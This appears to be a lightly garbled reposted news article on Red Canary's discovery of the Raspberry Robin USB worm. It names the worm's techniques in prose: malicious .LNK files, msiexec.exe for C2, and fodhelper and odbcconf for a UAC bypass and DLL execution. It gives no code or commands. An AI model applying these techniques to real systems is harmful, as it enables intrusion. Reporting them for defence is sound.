[ad_1]
Red Canary intelligence analysts have discovered a new Windows malware with worm capabilities that spreads via external USB drives.
This malware is linked to a malicious activity group called Raspberry Robin and was first observed in September 2021.
Red Canary’s Detection Engineering team detected the worm on the networks of multiple clients, some in the technology and manufacturing sectors.
Raspberry Robin spreads to new Windows systems when an infected USB drive containing a malicious .LNK file is plugged in.
Once attached, the worm spawns a new process using cmd.exe to launch a malicious file stored on the infected drive.
Legitimate Windows tools abused to install malware
It uses Microsoft’s standard installer (msiexec.exe) to communicate with its command and control (C2) servers, likely hosted on compromised QNAP devices and using TOR exit nodes as additional C2 infrastructure.
“While msiexec.exe downloads and executes legitimate installation packages, it is also exploited by adversaries to distribute malware,” the researchers said.
“Raspberry Robin uses msiexec.exe to attempt communication from an external network to a malicious domain for C2 purposes.”
Although they have not yet found whether and through what methods it establishes persistence, they suspect that the malware installs a malicious DLL file. [1, 2] on compromised machines to resist deletion between reboots.
Raspberry Robin launches this DLL with the help of two other legitimate Windows utilities: fodhelper (a trusted binary for managing features in Windows setup) and odbcconf (a tool for configuring ODBC drivers).
The former allows you to bypass User Account Control (UAC), while the latter will help you run and configure the DLL.
How and why?
While Red Canary analysts have been able to closely inspect what the newly discovered does on infected systems, there are still several questions that need to be answered.
“First of all, we don’t know how or where Raspberry Robin infects external drives to perpetuate its activity, although this is likely to happen offline or out of our visibility. We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers said. researchers.
“One hypothesis is that it may be an attempt to establish persistence on an infected system, although additional information is required to build confidence in that hypothesis.”
Since there is no information about the malicious end-stage tasks of this malware, another question that needs an answer is what is the goal of the Raspberry Robin operators.
More technical information about the Raspberry Robin worm, including Indicators of Compromise (IOCs) and an ATT&CK of this malware, can be found in the Red Canary report.
[ad_2]